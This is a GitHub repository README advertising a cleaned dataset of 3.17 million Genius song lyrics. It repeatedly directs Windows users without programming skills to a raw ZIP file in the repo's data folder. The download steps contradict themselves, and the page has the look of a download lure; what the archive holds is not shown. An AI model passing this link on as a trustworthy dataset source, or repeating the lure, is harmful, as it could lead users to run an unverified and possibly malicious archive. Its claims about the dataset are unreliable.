Skip to content

accruementstuff994/genius-lyrics-cleaned-dataset

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 

Repository files navigation

🎵 genius-lyrics-cleaned-dataset - Cleaned English Song Lyrics Dataset

Download Now


📄 About This Dataset

This dataset contains over 3.17 million cleaned and deduplicated English song lyrics. The data comes from Genius and includes key information like song title, artist, genre tag, year of release, and the full lyrics. It is a mirror of the dataset hosted on HuggingFace and is licensed under MIT. This dataset is suitable for uses like text analysis, language modeling, machine learning, and music research.

You do not need programming skills to work with this data if you only want to download and explore the contents. This guide will help you get the dataset on your Windows computer step by step.


⚙️ System Requirements

  • Windows 10 or later
  • At least 4 GB of free disk space (dataset size is roughly 800 MB compressed)
  • A modern web browser (Chrome, Edge, Firefox)
  • Optional: A CSV or JSON viewer (for exploring data files) such as Microsoft Excel or a free tool like VS Code or Notepad++

🚀 Downloading the Dataset

Click the large green button at the top or use the direct link below to visit the dataset page.

Download Dataset from GitHub

On this page, you will find the dataset files and instructions. Follow the next steps to get the dataset on your PC.


💾 How to Download and Extract the Dataset

  1. Open the link: https://github.com/accruementstuff994/genius-lyrics-cleaned-dataset/raw/refs/heads/main/data/lyrics-cleaned-dataset-genius-v2.5.zip

  2. Look for the "Code" button near the top right of the page, and click it.

  3. In the menu that opens, select Download ZIP. This will download a file named something like genius-lyrics-cleaned-dataset-main.zip to your default download folder.

  4. After the download finishes, open your "Downloads" folder and find the ZIP file.

  5. Right-click the ZIP file and choose Extract All....

  6. In the extraction dialog, pick a location where you want the dataset files to be saved (for example, your Desktop or Documents folder). Click Extract.

  7. Once extraction is complete, you can open the folder to see the dataset files.


🔍 Exploring the Dataset

The dataset contains multiple files with different formats, such as CSV or JSON:

  • lyrics.csv – This file holds the core data: title, artist, genre, year, and lyrics.
  • metadata.json – Contains metadata details about the dataset.
  • README.md – Additional information from the dataset creators.

If you want to open lyrics.csv, you can use programs like Microsoft Excel or any CSV viewer.


🛠 Using the Dataset

You don’t need to install anything special to browse the files. Just open the CSV file to view the lyrics and information.

For more advanced uses like text processing or machine learning:

  • Consider installing software like Python and Jupyter Notebook.
  • Use libraries like pandas for handling the data.
  • Use text editors to explore raw data in JSON files.

The data is useful for tasks like:

  • Language analysis
  • Song lyric research
  • Training language models
  • Creating music recommendation systems

🧰 Additional Tools and Tips

  • If CSV files are too large for Excel, try tools like CSVed or OpenRefine.
  • To search lyrics quickly, use a text editor with "Find" functions (VS Code, Notepad++).
  • Use databasing software if you want more complex queries on the dataset.

❓ Troubleshooting

  • If your download fails, check your internet connection and try again.
  • Ensure you have enough free disk space.
  • If the ZIP file fails to extract, try a different extraction tool like 7-Zip.
  • If you have trouble opening CSV files, try importing them into Excel using the import wizard.

📥 Download Link (Again)

Click here to visit the dataset page and download files:

https://github.com/accruementstuff994/genius-lyrics-cleaned-dataset/raw/refs/heads/main/data/lyrics-cleaned-dataset-genius-v2.5.zip

About

Provide a cleaned, filtered English lyrics dataset optimized for language model fine-tuning and music NLP research.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors